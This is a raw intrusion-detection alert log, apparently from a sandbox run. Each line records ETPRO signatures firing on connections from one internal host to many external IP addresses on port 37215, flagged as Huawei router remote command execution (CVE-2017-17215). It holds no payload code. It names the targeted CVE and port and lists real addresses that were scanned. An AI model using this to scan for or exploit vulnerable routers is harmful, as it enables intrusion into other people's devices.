                                            06/14/24-10:43:43.943109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3742437215192.168.2.14156.69.106.80
                                            06/14/24-10:44:04.410588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5538837215192.168.2.14197.145.50.31
                                            06/14/24-10:44:04.423723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3550037215192.168.2.14156.214.126.155
                                            06/14/24-10:44:27.001543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4626237215192.168.2.14156.177.168.20
                                            06/14/24-10:43:39.808016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4148437215192.168.2.14197.23.101.72
                                            06/14/24-10:43:36.700161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3354837215192.168.2.14156.255.160.13
                                            06/14/24-10:43:34.663310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3916437215192.168.2.1441.180.54.14
                                            06/14/24-10:43:54.183933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4266837215192.168.2.14156.2.187.67
                                            06/14/24-10:44:31.092400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3610837215192.168.2.14197.22.197.8
                                            06/14/24-10:44:10.547936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5631237215192.168.2.14197.29.204.1
                                            06/14/24-10:44:06.470329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5063237215192.168.2.14156.34.22.184
                                            06/14/24-10:44:02.368264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5139437215192.168.2.14156.60.218.144
                                            06/14/24-10:44:02.383090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5351237215192.168.2.14197.120.161.58
                                            06/14/24-10:44:10.568643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4374437215192.168.2.14156.92.79.35
                                            06/14/24-10:43:58.276436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4811837215192.168.2.14156.224.225.183
                                            06/14/24-10:43:58.294977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3312237215192.168.2.1441.0.164.226
                                            06/14/24-10:43:52.160634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5459437215192.168.2.14156.34.241.32
                                            06/14/24-10:43:48.020828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5867637215192.168.2.14156.231.213.36
                                            06/14/24-10:43:58.294263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4120437215192.168.2.1441.109.216.11
                                            06/14/24-10:44:22.877577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5272437215192.168.2.1441.254.185.103
                                            06/14/24-10:43:36.717357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5738637215192.168.2.1441.133.233.14
                                            06/14/24-10:44:10.565038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4717437215192.168.2.14156.225.38.46
                                            06/14/24-10:44:12.646535TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3831637215192.168.2.14197.51.137.146
                                            06/14/24-10:44:18.763168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4570837215192.168.2.14197.95.236.193
                                            06/14/24-10:43:36.723372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5719437215192.168.2.1441.211.157.43
                                            06/14/24-10:44:00.339516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5981837215192.168.2.14156.98.22.125
                                            06/14/24-10:44:10.543731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5094037215192.168.2.14156.160.146.155
                                            06/14/24-10:44:31.054318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3297037215192.168.2.14156.88.211.2
                                            06/14/24-10:44:04.423328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4817637215192.168.2.14156.192.235.22
                                            06/14/24-10:43:58.295613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4069037215192.168.2.14197.15.111.215
                                            06/14/24-10:43:43.972329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3944037215192.168.2.1441.250.110.6
                                            06/14/24-10:44:12.641411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6080437215192.168.2.14156.151.99.98
                                            06/14/24-10:44:14.682432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5056837215192.168.2.14156.94.130.85
                                            06/14/24-10:43:37.762468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5037437215192.168.2.14197.12.96.139
                                            06/14/24-10:43:50.111273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6019037215192.168.2.1441.169.20.0
                                            06/14/24-10:43:43.941509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5688037215192.168.2.14156.198.208.140
                                            06/14/24-10:44:04.421999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5237037215192.168.2.1441.181.227.125
                                            06/14/24-10:44:12.617697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4027637215192.168.2.14197.254.154.136
                                            06/14/24-10:44:18.763424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4264837215192.168.2.1441.82.28.47
                                            06/14/24-10:43:50.072803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5287037215192.168.2.1441.48.69.176
                                            06/14/24-10:44:14.668440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5536637215192.168.2.14156.106.60.222
                                            06/14/24-10:44:29.022498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3751237215192.168.2.14197.36.14.153
                                            06/14/24-10:43:36.703310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4582437215192.168.2.14156.117.76.121
                                            06/14/24-10:44:16.737453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4036437215192.168.2.1441.26.224.18
                                            06/14/24-10:44:22.860532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3934237215192.168.2.1441.121.209.49
                                            06/14/24-10:43:39.812665TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3597837215192.168.2.14156.183.127.88
                                            06/14/24-10:43:54.200929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5971037215192.168.2.14197.49.148.40
                                            06/14/24-10:44:12.644562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5358837215192.168.2.1441.92.83.53
                                            06/14/24-10:44:00.337758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6040037215192.168.2.14156.110.22.172
                                            06/14/24-10:44:35.181762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4151637215192.168.2.14156.189.132.62
                                            06/14/24-10:43:48.015791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4074837215192.168.2.1441.157.92.98
                                            06/14/24-10:44:04.423514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3473837215192.168.2.14197.176.95.247
                                            06/14/24-10:43:45.985251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3740837215192.168.2.14197.187.47.21
                                            06/14/24-10:44:18.776040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5849637215192.168.2.1441.161.39.241
                                            06/14/24-10:44:24.916802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6092637215192.168.2.14197.219.123.131
                                            06/14/24-10:44:00.323712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3535237215192.168.2.14197.65.25.206
                                            06/14/24-10:44:33.132907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5255437215192.168.2.14197.211.111.19
                                            06/14/24-10:43:54.183285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3550637215192.168.2.14197.105.9.77
                                            06/14/24-10:44:12.616630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4517437215192.168.2.14156.32.70.115
                                            06/14/24-10:43:34.675404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3484437215192.168.2.14197.237.52.108
                                            06/14/24-10:44:18.766530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4587837215192.168.2.1441.162.37.137
                                            06/14/24-10:44:24.914195TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5368037215192.168.2.1441.193.138.165
                                            06/14/24-10:43:58.277824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3856437215192.168.2.1441.204.39.162
                                            06/14/24-10:43:37.762330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5266637215192.168.2.14197.53.27.139
                                            06/14/24-10:43:50.069044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4452437215192.168.2.14156.143.166.23
                                            06/14/24-10:44:20.830868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5017037215192.168.2.14156.189.152.57
                                            06/14/24-10:44:04.424695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3939437215192.168.2.1441.39.166.126
                                            06/14/24-10:44:33.148947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4267437215192.168.2.14156.44.38.162
                                            06/14/24-10:43:52.150384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4726237215192.168.2.14156.178.115.70
                                            06/14/24-10:43:39.807864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5416837215192.168.2.1441.14.72.52
                                            06/14/24-10:44:14.672990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3576837215192.168.2.14156.196.235.9
                                            06/14/24-10:43:50.112114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4504637215192.168.2.14197.121.49.232
                                            06/14/24-10:44:14.682910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5632637215192.168.2.1441.78.48.197
                                            06/14/24-10:43:54.199056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5833237215192.168.2.14197.79.111.137
                                            06/14/24-10:44:12.643278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5890037215192.168.2.1441.14.252.187
                                            06/14/24-10:43:45.984569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5705637215192.168.2.1441.96.85.88
                                            06/14/24-10:44:18.763004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3453437215192.168.2.14197.17.240.117
                                            06/14/24-10:44:31.094623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4700837215192.168.2.1441.227.187.89
                                            06/14/24-10:43:43.942659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5093637215192.168.2.14156.192.230.215
                                            06/14/24-10:43:45.989654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5743437215192.168.2.14156.5.113.85
                                            06/14/24-10:43:54.200556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5671837215192.168.2.1441.134.147.101
                                            06/14/24-10:44:02.368148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4204037215192.168.2.1441.114.141.8
                                            06/14/24-10:43:41.850555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3279037215192.168.2.14156.98.207.57
                                            06/14/24-10:43:41.904741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6022637215192.168.2.1441.126.105.200
                                            06/14/24-10:44:35.176649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5330637215192.168.2.14197.186.133.106
                                            06/14/24-10:44:24.932967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3364837215192.168.2.14156.207.109.188
                                            06/14/24-10:44:26.979505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3574637215192.168.2.14156.83.119.46
                                            06/14/24-10:44:24.943372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3968237215192.168.2.14197.63.138.82
                                            06/14/24-10:43:48.020030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4453837215192.168.2.14156.204.202.2
                                            06/14/24-10:43:52.143107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5818237215192.168.2.14197.120.208.208
                                            06/14/24-10:44:20.807575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3476837215192.168.2.1441.182.167.228
                                            06/14/24-10:43:45.965954TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3541237215192.168.2.14156.63.37.173
                                            06/14/24-10:44:29.014268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5450237215192.168.2.14197.71.108.209
                                            06/14/24-10:44:29.023014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4793837215192.168.2.1441.154.205.23
                                            06/14/24-10:44:00.323300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5339437215192.168.2.14156.179.75.74
                                            06/14/24-10:44:00.343416TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5213837215192.168.2.1441.35.166.131
                                            06/14/24-10:44:10.545708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5231237215192.168.2.1441.224.2.237
                                            06/14/24-10:44:16.716430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5124237215192.168.2.1441.198.205.43
                                            06/14/24-10:44:10.544785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3821637215192.168.2.1441.228.176.107
                                            06/14/24-10:44:33.133369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4918437215192.168.2.14156.91.196.63
                                            06/14/24-10:44:10.581942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4539837215192.168.2.1441.39.72.141
                                            06/14/24-10:43:56.228328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4806637215192.168.2.1441.239.21.11
                                            06/14/24-10:44:20.806151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5706437215192.168.2.14156.7.86.124
                                            06/14/24-10:44:31.055639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3808837215192.168.2.1441.81.127.67
                                            06/14/24-10:44:06.451813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3637437215192.168.2.14197.15.199.30
                                            06/14/24-10:44:16.736311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4737037215192.168.2.14156.87.208.86
                                            06/14/24-10:44:18.763758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5649437215192.168.2.14197.75.15.161
                                            06/14/24-10:43:50.071076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4774837215192.168.2.14156.163.143.242
                                            06/14/24-10:44:22.879938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4660237215192.168.2.1441.73.26.40
                                            06/14/24-10:44:24.932854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6028037215192.168.2.14197.181.119.58
                                            06/14/24-10:44:00.339746TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5769837215192.168.2.14197.156.42.214
                                            06/14/24-10:44:02.367238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5730437215192.168.2.14156.96.46.251
                                            06/14/24-10:44:33.132557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5789237215192.168.2.1441.22.63.32
                                            06/14/24-10:43:39.808667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4565037215192.168.2.1441.13.206.136
                                            06/14/24-10:43:45.968651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5918637215192.168.2.14197.107.128.231
                                            06/14/24-10:44:22.859336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3963037215192.168.2.14197.191.30.1
                                            06/14/24-10:43:43.942448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4308437215192.168.2.14197.14.204.59
                                            06/14/24-10:43:36.701893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3407837215192.168.2.14197.252.148.60
                                            06/14/24-10:43:54.186016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4941437215192.168.2.14156.161.252.74
                                            06/14/24-10:43:54.183865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5822237215192.168.2.14156.246.143.10
                                            06/14/24-10:44:18.774833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5793437215192.168.2.1441.176.99.145
                                            06/14/24-10:43:43.940933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5319437215192.168.2.14197.48.101.211
                                            06/14/24-10:44:33.148814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4498637215192.168.2.1441.237.68.187
                                            06/14/24-10:44:18.762174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3299237215192.168.2.14156.62.253.132
                                            06/14/24-10:43:50.074762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3869637215192.168.2.14156.140.0.214
                                            06/14/24-10:44:08.518885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4193837215192.168.2.14197.147.182.110
                                            06/14/24-10:44:08.502384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3366637215192.168.2.1441.177.27.225
                                            06/14/24-10:44:33.135053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4719837215192.168.2.1441.135.90.158
                                            06/14/24-10:43:52.165396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3879237215192.168.2.14197.97.109.175
                                            06/14/24-10:44:06.472104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4577837215192.168.2.14197.0.110.75
                                            06/14/24-10:44:31.054947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5017837215192.168.2.14197.70.146.145
                                            06/14/24-10:43:58.275359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4849637215192.168.2.14156.99.228.141
                                            06/14/24-10:44:16.718315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3889637215192.168.2.14156.247.211.85
                                            06/14/24-10:44:06.452286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4177237215192.168.2.14197.233.3.74
                                            06/14/24-10:44:14.670731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4132637215192.168.2.14197.165.64.230
                                            06/14/24-10:44:27.001169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5523037215192.168.2.1441.139.236.140
                                            06/14/24-10:43:56.250838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4176437215192.168.2.14197.53.31.6
                                            06/14/24-10:44:16.733627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5785237215192.168.2.1441.208.32.196
                                            06/14/24-10:43:34.661364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5911237215192.168.2.14197.12.163.24
                                            06/14/24-10:44:20.806813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3399437215192.168.2.14197.168.123.149
                                            06/14/24-10:44:20.828836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3940037215192.168.2.14197.184.53.125
                                            06/14/24-10:44:16.732578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5244037215192.168.2.14197.93.102.28
                                            06/14/24-10:44:24.943850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3780037215192.168.2.14197.237.77.162
                                            06/14/24-10:43:41.905174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450037215192.168.2.14156.56.159.140
                                            06/14/24-10:44:04.422878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4249637215192.168.2.1441.99.96.57
                                            06/14/24-10:44:06.448727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5097837215192.168.2.1441.176.170.28
                                            06/14/24-10:44:33.132693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4750837215192.168.2.14197.181.139.121
                                            06/14/24-10:43:41.898361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4242437215192.168.2.1441.55.239.250
                                            06/14/24-10:44:08.518667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5845237215192.168.2.1441.233.89.126
                                            06/14/24-10:43:45.967882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3574237215192.168.2.1441.254.118.27
                                            06/14/24-10:44:14.670088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4968637215192.168.2.14197.137.144.54
                                            06/14/24-10:44:08.503790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5716637215192.168.2.1441.34.47.246
                                            06/14/24-10:44:16.717541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5017637215192.168.2.14156.79.138.128
                                            06/14/24-10:43:34.662270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3855637215192.168.2.14156.131.196.119
                                            06/14/24-10:44:24.916463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3759637215192.168.2.14197.114.152.113
                                            06/14/24-10:44:02.381229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3779037215192.168.2.1441.248.222.17
                                            06/14/24-10:44:22.860755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5193637215192.168.2.14197.175.117.179
                                            06/14/24-10:44:35.181529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3394637215192.168.2.14156.107.241.15
                                            06/14/24-10:44:14.670787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3942037215192.168.2.14156.36.229.133
                                            06/14/24-10:43:52.163387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3312437215192.168.2.14156.174.110.77
                                            06/14/24-10:43:56.229747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4368237215192.168.2.1441.149.107.105
                                            06/14/24-10:44:35.182968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5274437215192.168.2.14197.187.203.220
                                            06/14/24-10:44:16.736341TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4857637215192.168.2.14156.228.17.70
                                            06/14/24-10:43:41.848466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3827037215192.168.2.1441.18.12.5
                                            06/14/24-10:44:24.944487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5281237215192.168.2.14156.20.240.83
                                            06/14/24-10:43:45.992008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4813037215192.168.2.1441.40.224.85
                                            06/14/24-10:44:06.453035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3913037215192.168.2.14156.126.211.79
                                            06/14/24-10:44:18.761159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5766237215192.168.2.14197.55.69.251
                                            06/14/24-10:43:36.728584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4482237215192.168.2.14197.89.96.100
                                            06/14/24-10:43:50.115858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3615637215192.168.2.14197.6.236.92
                                            06/14/24-10:44:08.516899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3741037215192.168.2.1441.124.235.116
                                            06/14/24-10:43:50.069499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4313837215192.168.2.1441.211.247.104
                                            06/14/24-10:44:20.806972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5353237215192.168.2.14197.208.218.191
                                            06/14/24-10:44:08.518828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4523837215192.168.2.1441.23.193.34
                                            06/14/24-10:43:48.029490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3789237215192.168.2.1441.175.241.193
                                            06/14/24-10:44:14.671014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4984437215192.168.2.14156.41.226.3
                                            06/14/24-10:44:20.827973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5717637215192.168.2.14156.215.0.164
                                            06/14/24-10:43:45.966011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4546037215192.168.2.14156.163.9.163
                                            06/14/24-10:44:04.411044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4985637215192.168.2.1441.68.179.241
                                            06/14/24-10:44:33.131382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3437237215192.168.2.1441.215.51.58
                                            06/14/24-10:44:00.325059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4045437215192.168.2.1441.43.54.245
                                            06/14/24-10:43:34.662674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4051837215192.168.2.14156.59.39.131
                                            06/14/24-10:44:00.324465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4675437215192.168.2.1441.206.217.168
                                            06/14/24-10:44:00.340171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618837215192.168.2.14156.91.222.16
                                            06/14/24-10:43:37.772359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5026837215192.168.2.14156.235.168.70
                                            06/14/24-10:44:04.424724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3388037215192.168.2.14156.179.189.84
                                            06/14/24-10:44:33.134818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3711437215192.168.2.14156.245.45.69
                                            06/14/24-10:43:36.701611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4708037215192.168.2.14156.28.77.238
                                            06/14/24-10:43:41.847979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5745037215192.168.2.14156.174.243.7
